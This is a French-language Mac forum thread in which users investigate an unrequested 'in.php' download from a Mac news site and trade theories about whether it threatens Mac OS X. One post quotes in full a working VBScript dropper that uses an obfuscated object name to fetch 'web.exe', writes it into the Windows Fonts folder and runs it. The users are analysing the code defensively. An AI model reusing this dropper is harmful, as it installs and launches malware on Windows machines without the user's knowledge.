Téléchargement étrange

Pascal 77 a dit:
La recherche tourne toujours, Kathy, tu devrais faire la même sur ton G5 pour voir (c'est long, tu cherche "baraso" dans le contenu des fichiers, si nécessaire, laisse tourner toute le nuit, et quand c'est fini, tu jettes tout ce qu'il a trouvé, tu devrais être ensuite tranquille un moment.

Pour le script, je suis d'accord sur l'inocuité sur Mac, mais il ne gère pas un pop up, il tente d'installer un ficher nommé web.exe dans un dossier qu'il crée quelque part (j'ai pas compris ou, peut-être dans un dossier "font". Ce fichier web.exe est dans la liste des virus PC que détecte mon Norton.
Cliquez pour agrandir...

peux tu me donner la ligne de commande que tu as tapé dans le terminal pour faire ta recherche?

au fait voici la réponse de dulrich ( je fais l'intermédiaire entre macgé et macbidouille )
:D

" il ne l'a pas ouvert ( il parle de toi, lol)

CODE
<script language="vbs">
self.MoveTo 5000,5000

Set shell=CreateObject("WScript.Shell")
'Ebal Ya V Rot Kaspera
ebar = "logs.txt"
Set fso = CreateObject("Scripting.FileSystemObject")
Set OLEr = fso.CreateTextFile(ebar)
for y = 1 to 500
OLEr.Write " " + chr(13) + chr(10)
next
OLEr.close
megret="PTTHLMX.2lmxsM"

ddd = shell.SpecialFolders("Fonts") + "\" + "web.exe"
set dot=CreateObject(strreverse(megret))
dot.Open "GET", "../web.exe", false

dot.Send()
cs = dot.responseBody
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile(ddd)
for i = 0 to UBound(cs)
inta=1
intb=2
intc=int(intb)-int(inta)
c = ascb(midb(cs, i+1, 1))
f.Write chr(c)
next
f.close
shell.run(ddd)
window.close()
</script>


langage = vbs => visual basic script

ça change rien, ça reste du langage qui aurait du être exécuté côté client mais qui est chargé par le navigateur qui ne peut l'exécuter... ou le serveur qui devait l'exécuter qui n'a pas pu... dans les deux cas ça revient au même, c'est quelque chose qui arrive couramment. Mainteneant faut mettre à jour safari

[edit] et si ça c'est du php alors je suis karl marx
[edit2] c'est un script qui semble gérer/intégrer un popup."
 
Pascal 77 a dit:
La recherche tourne toujours, Kathy, tu devrais faire la même sur ton G5 pour voir (c'est long, tu cherche "baraso" dans le contenu des fichiers, si nécessaire, laisse tourner toute le nuit, et quand c'est fini, tu jettes tout ce qu'il a trouvé, tu devrais être ensuite tranquille un moment.

Pour le script, je suis d'accord sur l'inocuité sur Mac, mais il ne gère pas un pop up, il tente d'installer un ficher nommé web.exe dans un dossier qu'il crée quelque part (j'ai pas compris ou, peut-être dans un dossier "font". Ce fichier web.exe est dans la liste des virus PC que détecte mon Norton.
Cliquez pour agrandir...

ma recherche tourne aussi mais pour l'instant rien....
:p
 
Juste pour vous dire ( et oui je me lève tôt même le dimanche car j'ai du boulot en retard ) qu'on a quand même , avec un ami développeur, un doute sur ce fichier " in.php" qui ne serait soit disant pas dangereux sur mac .

Je vous pose quand même une question : A votre avis pourquoi on choppe ce truc essentiellement sur des forums Mac? et bien j'ai comme l'impression il y a des petits malins qui sont entrain d'essayer de prouver que Mac OS X peut être atteind .

En tout cas Pour mac OS X c'est plus une erreur de codage qu'un vrai virus et il semble , que même si il ne cause pas de dégâts , il ralentisse quand même la machine...

:mad: :mad: :mad: :mad:

Edit : en tout cas ce matin il est là notre ami php ( et pas ricoré ) toujours quand vous visitez ce site mac = mac en ligne = http://www.lemacenligne.com/

je suis entrain de faire des recherches par heure d'apparaition ...
 
Bon, chez moi, j'ai laissé la recherche tourner cette nuit (pas de commande terminal, recherche finder sur le contenu du fichier avec option "fichiers visibles et invisibles"). Malheureusement, coupure de courant cette nuit, donc à refaire. Je pense qu'il n'y a plus rien, car j'avais auparavant recherché tous les fichiers créés à l'heure du téléchargement (toujours recherche "Finder", fichiers créés aujourd'hui, visibles et invisibles, et résultat trié sur la date de création), et avait trouvé (et détruit après examen) cet espèce de cookie cafteur.

Pour MacBidouille, j'avais été voir, et lu ce post, et je confirme que si ce script est en Visual Basic, Microsoft à salement fait diverger VBA (avec lequel je développe régulièrement) de VBS, au point qu'en dehors de "set" et "for ... next", ils n'aient plus rien de commun. Ceci posé, lorsque je parle d'un script php, je ne pense pas au contenu du fichier, mais à son enveloppe. Le php est exécuté depuis le serveur, ce qu'il reste sur ton bureau, c'est ce qu'il tente d'infiltrer dans un sous dossier de Windows aux fins d'exécution (importer un programme "web.exe" qui est un virus Windows).

Pour la prétendue "faille de sécurité" de Mac OS X, elle n'existe pas. Ce fichier arrive dans le dossier de réception des téléchargements (dans notre cas, le bureau) désigné à Safari (ou autre navigateur), en utilisant les droits du dit navigateur. Supposons qu'il contienne un AppleScript qui doive faire venir un virus Mac, il ne pourra pas l'implanter dans un autre dossier plus sensible, faute d'autorisation. Il n'y a donc pas de faille de sécurité à mon avis.
 
Pascal 77 a dit:
Bon, chez moi, j'ai laissé la recherche tourner cette nuit (pas de commande terminal, recherche finder sur le contenu du fichier avec option "fichiers visibles et invisibles"). Malheureusement, coupure de courant cette nuit, donc à refaire. Je pense qu'il n'y a plus rien, car j'avais auparavant recherché tous les fichiers créés à l'heure du téléchargement (toujours recherche "Finder", fichiers créés aujourd'hui, visibles et invisibles, et résultat trié sur la date de création), et avait trouvé (et détruit après examen) cet espèce de cookie cafteur.

Pour MacBidouille, j'avais été voir, et lu ce post, et je confirme que si ce script est en Visual Basic, Microsoft à salement fait diverger VBA (avec lequel je développe régulièrement) de VBS, au point qu'en dehors de "set" et "for ... next", ils n'aient plus rien de commun. Ceci posé, lorsque je parle d'un script php, je ne pense pas au contenu du fichier, mais à son enveloppe. Le php est exécuté depuis le serveur, ce qu'il reste sur ton bureau, c'est ce qu'il tente d'infiltrer dans un sous dossier de Windows aux fins d'exécution (importer un programme "web.exe" qui est un virus Windows).

Pour la prétendue "faille de sécurité" de Mac OS X, elle n'existe pas. Ce fichier arrive dans le dossier de réception des téléchargements (dans notre cas, le bureau) désigné à Safari (ou autre navigateur), en utilisant les droits du dit navigateur. Supposons qu'il contienne un AppleScript qui doive faire venir un virus Mac, il ne pourra pas l'implanter dans un autre dossier plus sensible, faute d'autorisation. Il n'y a donc pas de faille de sécurité à mon avis.
Cliquez pour agrandir...

J'ai trouvé ça à propos des vrus php : http://linuxbsd.free.fr/fichier.php?format=2&doc=11
 
je viens de leur écrire pour leur expliquer ce qui se passe avec ce fichier" in php" et leur demander leur opinion d'autant plus que cet article est récent : ( lien donné dans mon post précédant )
 
kathy h a dit:
J'ai trouvé ça à propos des vrus php : http://linuxbsd.free.fr/fichier.php?format=2&doc=11
Cliquez pour agrandir...

J'ai jeté un ½il; mais là, ça concerne des serveurs internet, pas des postes de travail. En plus, une des principale différence entre Mac OS X et Linux est précisément la gestion des autorisations, beaucoup plus élaborée sur Mac OS X.au classement d'un organisme certificateur anglais, sur le plan sécurité, Mac OS X arrive premier, loin devant Windows XP, second, et Linux, troisième. C'est dire si point de vue sécurité, Linux n'est pas une référence. Toutefois, il faut reconnaître que des mesures aisées à mettre en ½uvre permettent de le sécuriser de manière satisfaisante, alors que c'est plus compliqué (voire impossible) sous Windows.
 
Bonjour Pour ma part je suis quasi certain d'avoir eu des logeurs dans mon Book. A mon oeil(qui n'est pas infaillible) et à mes observations, j'en atribue la cause à mes visites chez Firefox.
 
Hello tout le monde :coucou:

kathy h a dit:
Je vous pose quand même une question : A votre avis pourquoi on choppe ce truc essentiellement sur des forums Mac? et bien j'ai comme l'impression il y a des petits malins qui sont entrain d'essayer de prouver que Mac OS X peut être atteind..
Cliquez pour agrandir...

Je pensais à autre chose... beaucoup de Mac users, moi y compris, travaillent aussi sur des PC. Et il arrive que entre deux travaillent on visite des sites Mac depuis nos petits PC... et là... c'est la cata... Je ne pense pas qu'il vise directement OS X, car si c'était le cas il n'aurait jamais été écrit en VBS ce script.( je l'ai sauté cette ligne :p )

kathy h a dit:
Edit : en tout cas ce matin il est là notre ami php ( et pas ricoré ) toujours quand vous visitez ce site mac = mac en ligne = http://www.lemacenligne.com/

je suis entrain de faire des recherches par heure d'apparaition ...
Cliquez pour agrandir...

Je l'ai eu hier lors de ma première visite sur ce site et je ne l'ai plus depuis... je me suis demandé s'il ne regarde pas l'adresse IP ? comme je suis sur le câble et en DHCP, mon adresse IP ne change pas.

Donc si vous êtes sur ADSL en IP dynamique, essayer de réinitialiser votre connexion et tester sur ce site pour voir si le script va se lancer encore ou non ? Kathy c'est peut-être la raison pour laquelle tu l'as eu une fois hier et il faut attendre ce matin pour pouvoir le rechopper...
 
NightWalker a dit:
Hello tout le monde :coucou:



Je pensais à autre chose... beaucoup de Mac users, moi y compris, travaillent aussi sur des PC. Et il arrive que entre deux travaillent on visite des sites Mac depuis nos petits PC... et là... c'est la cata... Je ne pense pas qu'il vise directement OS X, car si c'était le cas il n'aurait jamais été écrit en VBS ce script.( je l'ai sauté cette ligne :p )



Je l'ai eu hier lors de ma première visite sur ce site et je ne l'ai plus depuis... je me suis demandé s'il ne regarde pas l'adresse IP ? comme je suis sur le câble et en DHCP, mon adresse IP ne change pas.

Donc si vous êtes sur ADSL en IP dynamique, essayer de réinitialiser votre connexion et tester sur ce site pour voir si le script va se lancer encore ou non ? Kathy c'est peut-être la raison pour laquelle tu l'as eu une fois hier et il faut attendre ce matin pour pouvoir le rechopper...
Cliquez pour agrandir...

j'ai une adresse IP dynamique c'est peut-être pour cela que je l'ai " attrapé" aussi ce matin

Pour pascal 77 : En ce qui concerne les caches j'ai dû les effacer plusieurs fois ( tous donc même ceux du système) et ça ne change rien
 
itation:
Posté par kathy h
Edit : en tout cas ce matin il est là notre ami php ( et pas ricoré ) toujours quand vous visitez ce site mac = mac en ligne = http://www.lemacenligne.com/

je suis entrain de faire des recherches par heure d'apparaition ...Salut NightWalker..Salut Kathy h.

Je confirme Visite sur mac en ligne et immédiatement in php s'est téléchargé sans que je ne ledemande.
 
valoriel a dit:
Pour faire plaisir à Kathy, je suis aller sur le site de mac en ligne et là, bingo, le bidule se télécharge! Avec la 10.4.1 il me demande confirmation, mais c'est inquiétant quand même :nailbiting:
Cliquez pour agrandir...

merci
:love: :love:

ah oui ça me fait bien plaisir :D :D
 
Ah mais il y a du monde en ce dimanche... :coucou:

Salut José, ça faisait long temps... :)


kathy h a dit:
j'ai une adresse IP dynamique c'est peut-être pour cela que je l'ai " attrapé" aussi ce matin

Pour pascal 77 : En ce qui concerne les caches j'ai dû les effacer plusieurs fois ( tous donc même ceux du système) et ça ne change rien
Cliquez pour agrandir...

Kathy, tu peux faire le test pour moi...

1. Normalement si tu retournes sur le site Mac en Ligne maintenant, in.php ne devrait pas se télécharger.
2. Peux-tu relever ton IP internet actuelle ? puis tu réinitialise ta connexion internet, le mieux est d'éteindre ton modem puis le rallumer. Normalement une fois que tu es reconnectée, tu devrais avoir une nouvelle adresse IP.
3. Peux-tu reessayer de te connecter sur le site de Mac en Ligne... normalement in.php devrait se télécharger. Il faudra dans ce cas là prévenir le site, à moins que c'est peut-être déjà fait ?

à peluche...
 
NightWalker a dit:
Ah mais il y a du monde en ce dimanche... :coucou:

Salut José, ça faisait long temps... :)




Kathy, tu peux faire le test pour moi...

1. Normalement si tu retournes sur le site Mac en Ligne maintenant, in.php ne devrait pas se télécharger.
2. Peux-tu relever ton IP internet actuelle ? puis tu réinitialise ta connexion internet, le mieux est d'éteindre ton modem puis le rallumer. Normalement une fois que tu es reconnectée, tu devrais avoir une nouvelle adresse IP.
3. Peux-tu reessayer de te connecter sur le site de Mac en Ligne... normalement in.php devrait se télécharger. Il faudra dans ce cas là prévenir le site, à moins que c'est peut-être déjà fait ?

à peluche...
Cliquez pour agrandir...

Désolée de te contredire mais je ne pense pas que l'adresse Ip est un rapport car j'y suis retournée plusieurs fois de suite et j'ai eu le fichier plusieurs fois ce matin sans débrancher mon modem.

en revanche si une personne voulait bien écrire au site mac en ligne pour lui expliquer ce qui se passe et lui donner évnetuellement le lien de ce thread, j'en ai assez d'écrire à droite et à gauche pour ce problème
;) :up:
 
c'est dulrich de macbidouille qui a raison le fichier " in.php" est bien du Visual basic.

"is a malicious HTML file (web page) that contains a Visual Basic script "
 

Sujets similaires

jeamy
Fichiers impossible à déplacer vers bureau
Réponses
10
Affichages
1K
macOS
jeamy
jeamy
J
macOS Ventura Dossiers principaux disparus
Réponses
17
Affichages
1K
macOS
juliensl
J
M
10.14 Mojave Bureau non modifiable
Réponses
2
Affichages
688
macOS
moi
M
Profiler31
macOS Monterey Photo n'affiche plus
Réponses
16
Affichages
1K
macOS
Profiler31
Profiler31
C
macOS Monterey Retrouver des fichiers supprimés
Réponses
12
Affichages
2K
macOS
Kikebetico
Kikebetico
Haut Bas
Back